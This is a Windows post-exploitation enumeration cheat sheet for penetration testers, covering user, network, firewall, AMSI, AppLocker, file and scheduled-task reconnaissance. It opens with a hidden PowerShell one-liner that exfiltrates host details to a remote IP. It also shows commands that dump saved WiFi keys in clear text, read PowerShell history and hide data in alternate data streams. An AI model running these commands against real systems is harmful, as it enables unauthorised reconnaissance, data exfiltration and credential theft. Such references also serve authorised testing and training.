Windows

Introduction

This section contains some useful commands that will help you enumerate the Windows system, obtaining helpful information for a later Privilege Escalation or Lateral movements.

General information exfiltration

C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"

PowerShell History

c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

User and group enumeration

whoami
echo %username%

Privileges

Displays the current user name and groups to which the user belongs and the security identifiers (SIDs), notifications and privileges for the current user's access token.

whoami /all

Enumerate the SE privileges of the current user

whoami /priv

Groups

net localgroup
net localgroup "<Group>"
# View Domain Groups
net "<Group>" /domain

Operative system

• Architecture:

wmic os get osarchitecture

• General information:

ver
systeminfo

• Environment variables:

cmd /c set

• Hostname & Domain

echo %USERDOMAIN% -> Returns domain name
systeminfo | findstr /B /C:"Domain"

Get-WMIObject Win32_ComputerSystem | Select-Object Name, Domain

Network enumeration

• Hardcoded domains:

The file /etc/hosts also exist on Windows under the following path.

C:\Users\Marmeus>type C:\Windows\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost

• Port enumeration:

netstat -ano

• Display routing table:

route print

• Network configuration:

ipconfig /all

• Shares:

net share
net1 share

• SMB Signing enabled

Get-SmbServerConfiguration | select EnableSecuritySignature

• View computers on your network:

net view

• Status Firewall / AV / Windows Defender

# Status windefender
sc query windefend 

# Status firewall
netsh firewall show state 
netsh firewall show config
netsh advfirewall show allprofiles

# Deprecated command
netsh advfirewall firewall dump 

# Check if Windows Defender is enabled
Get-MpComputerStatus

# Check if firewall it is enabled
Get-NetFirewallProfile | Select-Object Name,Enabled

# Allowed Firewall Ports
Get-NetFirewallRule | Get-NetFirewallPortFilter | Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -ne 'Any' }  

# Blocked ports/applications
Get-NetFirewallRule -PolicyStore ActiveStore | where {$_.Action -eq "Block"} 

• WiFi Passwords: On windows 10 we can obtain WiFi Passwords for each AP that the computer has ever connected.

1. netsh wlan show profile
2. netsh wlan show profile name=<ProfileName> key=clear

• Show ARP tables:

arp -a

Constrained Language Enabled (CLM)

Constrained Language Mode is a security feature designed to restrict the capabilities of PowerShell scripts, making them more secure and less prone to exploitation. When Constrained Language Mode is enabled, PowerShell restricts the use of certain language elements and cmdlets to help prevent potential malicious activities.

$ExecutionContext.SessionState.LanguageMode
# If enabled it wouldn't work
[Math]::Cos(1)
[System.Console]::WriteLine("ConstrainedModeTest")

To bypass this countermeasure go to Countermeasure Evasion - CLM

AMSI

AMSI stands for Antimalware Scan Interface, and it is a security feature in Windows designed to help protect against script-based malware.

There are several ways to check if AMSI is enabled:

# Alternative 1
'amsiutils'
'amsicontext'
'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
'Invoke-Mimikatz'

# Alternative 2
set-content .\ADS_Test.txt:EICAR 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

To bypass this countermeasure go to Countermeasure Evasion - AMSI

AppLocker

AppLocker is a security feature in Windows operating systems that allows administrators to control which applications and executable files are allowed to run on a system. It provides a way to define and enforce application whitelisting policies, helping organizations enhance their security by preventing the execution of unauthorized or potentially malicious software.

You can check if AppLocker is enabled with the following command.

ApGet-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status

Obtain AppLocker rules:

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ExecutionPolicy -List | Format-Table -AutoSize

To bypass this countermeasure go to Countermeasure Evasion - AppLocker.

Files Enumeration

PowerShell History

type c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

Disks

There are several ways to obtain the mounted disks on the system.

# CMD
list volume
# PowerShell
c:\Users>powershell -c get-psdrive -psprovider filesystem

Name           Used (GB)     Free (GB) Provider      Root  CurrentLocation
----           ---------     --------- --------      ----  ---------------
C                  19,69          9,70 FileSystem    C:\   Users
W                   2,52         17,48 FileSystem    W:\

Alternate Data Streams

Alternate Data Streams (ADS) are a file attribute only found on the NTFS file system. In this system, a file is built up from a couple of attributes, one of them is $Data, also known as the data attribute. Looking at the regular data stream of a text file there is no mystery. It simply contains the text inside the text file. But that is only the primary data stream.

This one is sometimes referred to as the unnamed data stream since the name string of this attribute is empty ( "" ). So any data stream that has a name is considered an alternate.

Find Data Alternate Streams in a directory.

dir /r

If you want to search a directory or drive for ADS you can use this command in the root of the target:

gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'

Adding data to an alternate data stream.

echo payaso | set-content -path .\prueba.txt -stream hidden
echo pepe | prueba.txt:pepe

Read Alternate Data Streams.

gc -path .\prueba.txt -stream hidden
more < prueba.txt:hidden

Permissions

Windows permission terminology can be quite challenging to understand. In this subsection, you will find how to obtain the attributes and their meaning.

# Directory permissions
Get-acl C:\backup\Scripts\* | Format-Table -Wrap -Autosize 
# Directory / File permissions
icacls "<Path>"

Simple Rights

Specific Rights

Inheritance righsts (Applied only to directories)

Service rights

The first letter represents Allow (A) the opposite of Deny which would be represented by a (D).

List Installed HotFixes

List all installed patches on the system.

Get-Hotfix

Running processes

tasklist

Scheduled Tasks

List/enumerate all the scheduled tasks present on the system.

(Get-ScheduledTask [-TaskName '<TASK_NAME>']).Actions
# List scheduled tasks under Users folder
Get-ScheduledTask -TaskPath "\Users\*"
# List specific information on specified Tasks
Get-ScheduledTaskInfo -TaskName <Full Path>